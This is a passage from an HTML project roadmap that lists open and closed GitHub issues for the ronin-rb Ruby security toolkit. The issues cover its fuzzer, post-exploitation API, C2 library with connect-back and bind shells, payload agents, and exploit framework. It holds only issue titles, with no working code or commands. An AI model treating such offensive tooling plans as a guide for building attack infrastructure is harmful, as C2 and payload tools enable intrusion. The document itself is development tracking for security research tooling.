<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-fuzzer/issues/5">Add Ronin::Fuzzing::CLI CLI</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-fuzzer/issues/4">Add ronin-support as a dependency chore dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-fuzzer/issues/3">Re-add project files chore</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-fuzzer/issues/2">Add combinatorics as a dependency chore dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-fuzzer/issues/1">Update project name/description in license headers chore</a></li>
</ul>
<h3 id="ronin-post_ex"><a href="https://github.com/ronin-rb/ronin-post_ex/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-post_ex</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-post_ex</a> is a Ruby API for Post-Exploitation.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-post_ex/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/21">Add a call method to System</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/20">Add a Net resource for networking methods</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/19">Add a Socket resource similar to File</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/11">Add top-level methods to System that can use fs/process or shell_exec equivalent commands</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/18">Rename Mixin to System</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/17">Refactor Shells::FS to use Ronin::Core::CLI::Shell</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/16">Document the Post Exploitation API</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/15">Bump copyright year</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/14">Update project name/description in license headers</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/13">Change license to LGPL-3.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/12">Re-add project files</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/10">Add a Ronin::PostEx::System class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/9">Replace Ronin::PostExploitation::IO with the fake_io gem</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/1">Add Ronin::PostEx::CapturedFile</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/5">Rename Ronin::PostExploiitation::File to RemoteFile</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-post_ex/issues/2">Extract Ronin::PostExploitation::IO out into it’s own gem</a></li>
</ul>
<h3 id="ronin-c2"><a href="https://github.com/ronin-rb/ronin-c2/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-c2</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-c2#readme">ronin-c2</a> is a C2 library for ronin that can communicate with various payloads
and agents.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-c2/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/26">Add Ronin::C2::ConnectBackShell class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/25">Add Ronin::C2::BindShell class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/24">Add Ronin::C2::Agent::HTTPServer class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/23">Add Ronin::C2::Agent::HTTPClient class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/22">Add Ronin::C2::Agent::TCPServer class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/21">Add Ronin::C2::Agent::TCPClient class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/20">Add support for the RONIN_HTTP_PROXY env variable</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/19">Add project files</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/18">Add a Ronin::C2::Encoding::RSA class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/17">Add a Ronin::C2::Encoding::Base64 class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/13">Add a Ronin::C2::Message::JSONRPC::Response class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/12">Add a Ronin::C2::Message::JSONRPC::Request class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/11">Add a Ronin::C2::Message::Response abstract class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/10">Add a Ronin::C2::Message::Request abstract class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/9">Add a Ronin::C2::Transport::HTTPServer class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/8">Add a Ronin::C2::Transport::HTTPClient class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/7">Add a Ronin::C2::Transport::TCPServer class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/6">Add Ronin::C2::Transport::TCPClient class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/5">Add async-io and async-http as dependencies</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/3">Add ronin-post_exploitation as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/1">Add a ronin-c2 main command</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/2">Add sub-commands for connecting to or starting C2 end-points</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-c2/issues/4">Add ronin-core as a dependency</a></li>
</ul>
<h3 id="ronin-agent-node"><a href="https://github.com/ronin-rb/ronin-agent-node/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-agent-node</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-agent-node#readme">ronin-agent-node</a> is a ronin agent written in node.js.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-agent-node/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-agent-node/issues/8">Support JSON RPC 2.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-agent-node/issues/5">Add a build script</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-agent-node/issues/4">Update code to use let and const</a></li>
</ul>
<h3 id="ronin-agent-php"><a href="https://github.com/ronin-rb/ronin-agent-php/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-agent-php</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-agent-php#readme">ronin-agent-php</a> is a ronin agent written in PHP.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-agent-php/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-agent-php/issues/8">Support JSON RPC 2.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-agent-php/issues/5">Add a build script</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-agent-php/issues/4">Upgrade the code to PHP5</a></li>
</ul>
<h3 id="ronin-agent-ruby"><a href="https://github.com/ronin-rb/ronin-agent-ruby/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-agent-ruby</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-agent-ruby#readme">ronin-agent-ruby</a> is a ronin agent written in Ruby.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-agent-ruby/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-agent-ruby/issues/6">Move Agent::TCP, Agent::UDP, and Agent::HTTP into Agent::Transports</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-agent-ruby/issues/5">Rename Transport to Message</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-agent-ruby/issues/4">Support JSON RPC 2.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-agent-ruby/issues/2">Rewrite TCP::Server to use TCPServer</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-agent-ruby/issues/8">Move all RPC methods into an RPC module</a></li>
</ul>
<h3 id="ronin-payloads"><a href="https://github.com/ronin-rb/ronin-payloads/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-payloads</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> is a Ruby micro-framework for writing and running exploit
payloads.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-payloads/tree/main">main</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/24">Refactor Payloads and Encoders classes to be plain Ruby Classes</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/22">Move Ronin::Encoders into Ronin::Payloads::</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/15">Remove the ronin/gen directory</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/14">Add a Ronin::Payloads::CLI::Commands::Gen command</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/11">Replace all database properties with class methods for declaring metadata</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/10">Replace options={} with keyword arguments</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/9">Rename Ronin::UI::CLI to Ronin::Payloads::CLI</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/8">Refactor Ronin::UI::CLI::Commands to use Ronin::Core::CLI::Command</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/6">Add ronin-c2 as a dependency</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/25">Added ronin-repos as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/23">Add ronin-post_ex as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/21">Change license to LGPL-3.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/20">Remove ronin/payloads/helpers</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/13">Remove ronin/database/migrations</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/12">Re-add project files</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-payloads/issues/7">Add ronin-core as a dependency</a></li>
</ul>
<h3 id="ronin-exploits"><a href="https://github.com/ronin-rb/ronin-exploits/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin-exploits</a></h3>
<p><a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> is a Ruby library for writing and running exploits and
payloads.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin-exploits/tree/1.0.0">1.0.0</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/69">Add a Ronin::Exploits::CLI::Commands::Gen subcommand</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/66">Replace all database properties with class methods for declaring metadata</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/65">Replace options={} with keyword arguments</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/62">Add ronin-c2 as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/58">Include Ronin::Core::ModuleRegistry into Ronin::Exploits</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/57">Update the ronin-exploits/ronin-exploit commands to use ronin-repos</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/55">Add a Ronin::Exploits::CLI main command class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/54">Rename Ronin::UI::CLI to Ronin::Exploits::CLI</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/53">Refactor the Ronin::Exploits::CLI::Commands classes to use Ronin::Core::CLI::Command</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/40">Eventually support truffleruby</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/39">Eventually re-enable jruby in the CI</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/37">Add a “new” subcommand</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/30">Rename to ronin-exploit or ronin-exploitation to avoid confusion?</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/29">Refactor Ronin::Exploits::Exploit classes to be plain Ruby Classes</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/80">Require ruby >= 2.7.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/79">Change license to LGPL-3.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/78">Add ronin-core as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/77">Remove dm-visualizer dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/76">Add ronin-post_ex as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/75">Remove the yard-parameters dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/74">Remove the yard-dm dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/73">Remove ronin/vuln.rb</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/72">Remove ronin/advisory.rb</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/71">Remove exploits related database migration files from ronin/database/migrations/</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/70">Remove ronin/gen/ directory</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/67">Remove payload and encoder files in favor of ronin-payloads</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/64">Extract lib/ronin/payloads out into it’s own repository</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/63">Add ronin-payloads as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/61">Remove ronin/post_exploitation in favor of the new ronin-post_exploitation gem</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/56">Add ronin-repos as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/49">Remove the ronin dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/46">Delete ronin/payloads in favor of a new ronin-payloads gem</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/45">Extract Ronin::PostExploitation into it’s own repository</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/44">Extract the Ruby RPC payload out into it’s own repository</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/43">Extract the PHP RPC payload out into it’s own repository</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/42">Extract the node.js RPC payload out into it’s own repository</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/38">Move yard dependencies from gemspec.yml into Gemfile</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/35">Remove ronin-gen dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/34">Remove data_paths dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin-exploits/issues/33">Remove open_namespace dependency</a></li>
</ul>
<h3 id="ronin"><a href="https://github.com/ronin-rb/ronin/issues?q=is%3Aopen+is%3Aissue+project%3Aronin-rb%2F2">ronin</a></h3>
<p>The main <a href="https://github.com/ronin-rb/ronin#readme">ronin</a> gem.</p>
<p><strong>Note:</strong> Development work is currently taking place on the
<a href="https://github.com/ronin-rb/ronin/tree/2.0.0">2.0.0</a> branch.</p>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/71">Eventually re-add jruby to the CI matrix</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/70">Eventually support truffleruby</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/61">Make ronin a “meta gem” which pulls in all other ronin-* gems</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/55">Add a tip subcommand</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/54">Add a gen subcommand</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/53">Add a http subcommand</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/52">Add a netcat subcommand</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/51">Add a unhexdump subcommand to ronin using Ronin::Binary::Hexdump::Parser in ronin-support</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/50">Add a hexdump subcommand</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/49">Add a smart grep subcommand</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/48">Add a strings subcommand</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><a href="https://github.com/ronin-rb/ronin/issues/47">Add enc and dec subcommands</a></li>
</ul>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/86">Re-add the Ronin::CLI::Command base class</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/85">Remove Ronin::Installation</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/84">Bump required_ruby_version to 2.7.0</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/83">Remove lib/bond/</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/82">Remove files replaced by ronin-core</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/81">Remove yard-dm dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/80">Remove dm-* dependencies</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/79">Add ronin-db as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/78">Move the ronin-fuzzer command into the ronin-fuzzer repository</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/77">Rename Ronin::UI::CLI to just Ronin::CLI</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/76">Remove Ronin::UI::Console in favor of Ronin::Core::Console</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/75">Add ronin-repos as a dependency</a></li>
